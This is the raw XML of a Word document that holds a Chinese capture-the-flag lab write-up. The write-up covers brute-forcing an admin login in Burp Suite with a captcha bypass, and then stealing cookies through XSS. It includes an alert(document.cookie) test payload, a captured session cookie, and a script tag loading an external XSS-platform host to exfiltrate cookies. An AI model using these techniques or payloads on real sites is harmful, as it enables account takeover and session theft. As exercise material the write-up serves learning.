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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第三章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后台爆破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1.打开bp，登录界面随便输入用户名和密码，验证码输正确，用burp抓包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1741805"/>
            <wp:effectExtent l="0" t="0" r="1905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958975"/>
            <wp:effectExtent l="0" t="0" r="381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2.验证码随即替换，如何绕过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1501775"/>
            <wp:effectExtent l="0" t="0" r="889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1579880"/>
            <wp:effectExtent l="0" t="0" r="889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抓包后，不论如何改密码变量send，验证码都不会再变，相当于已经绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1949450"/>
            <wp:effectExtent l="0" t="0" r="381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3.这些标蓝框的就是定义要爆破的模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1525905"/>
            <wp:effectExtent l="0" t="0" r="635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4.Clear后给username和password再add添加，上面会有四个参数，这里我们选第四个。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3337560" cy="9753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964690" cy="1870710"/>
            <wp:effectExtent l="0" t="0" r="127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251710" cy="1872615"/>
            <wp:effectExtent l="0" t="0" r="381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171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5.分别添加第一个和第二个字典，点击开始，得到结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1757680"/>
            <wp:effectExtent l="0" t="0" r="14605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477260"/>
            <wp:effectExtent l="0" t="0" r="127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6.去网站实验，密码正确。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4217670" cy="2038985"/>
            <wp:effectExtent l="0" t="0" r="381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83685" cy="757555"/>
            <wp:effectExtent l="0" t="0" r="635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3315970"/>
            <wp:effectExtent l="0" t="0" r="6985" b="17780"/>
            <wp:docPr id="1" name="图片 1" descr="7J8IYAR9L7[HFLN5_`5)66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J8IYAR9L7[HFLN5_`5)66J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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;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进行xss判断</w:t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70500" cy="3903345"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="3" name="图片 3" descr="E)8~8KI~ZRZ2@])9G)[P)`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)8~8KI~ZRZ2@])9G)[P)`U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086350" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="@IP~KZ(}@)665LPNL73NN9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@IP~KZ(}@)665LPNL73NN9K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ASPSESSIONIDAARTSDBR=OJGNGMPBIILOFGCJJBOMIILH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即为获得的cookie值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使用xss平台</w:t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65420" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="8S8TCROSJG(C(SX2%3{34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S8TCROSJG(C(SX2%3{349C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创建一个新的项目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使用项目给出的</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;sCRiPt sRC=http://xss.fbisb.com/IlLs&gt;&lt;/sCrIpT&gt;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注入</w:t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打开项目名称可以在cookie中查到flag=zkz{xsser-g00d</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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}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C7404E"/>
    <w:rsid w:val="00670178"/>
    <w:rsid w:val="08B71609"/>
    <w:rsid w:val="0F1C40AB"/>
    <w:rsid w:val="14A45BED"/>
    <w:rsid w:val="1B37267D"/>
    <w:rsid w:val="1FEB6514"/>
    <w:rsid w:val="229C136A"/>
    <w:rsid w:val="2778775A"/>
    <w:rsid w:val="29A619A7"/>
    <w:rsid w:val="2D33306C"/>
    <w:rsid w:val="2E6B34A1"/>
    <w:rsid w:val="37110CA7"/>
    <w:rsid w:val="3DC7404E"/>
    <w:rsid w:val="3DE83BDC"/>
    <w:rsid w:val="4B953327"/>
    <w:rsid w:val="557C570E"/>
    <w:rsid w:val="5F6D62D8"/>
    <w:rsid w:val="607A7EF1"/>
    <w:rsid w:val="60F3177D"/>
    <w:rsid w:val="64847036"/>
    <w:rsid w:val="76186629"/>
    <w:rsid w:val="7B246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2020-07-07T10:23:00Z</dcterms:created>
  <dc:creator>野生卓</dc:creator>
  <cp:lastModifiedBy>京华倦客</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-11T01:09:12Z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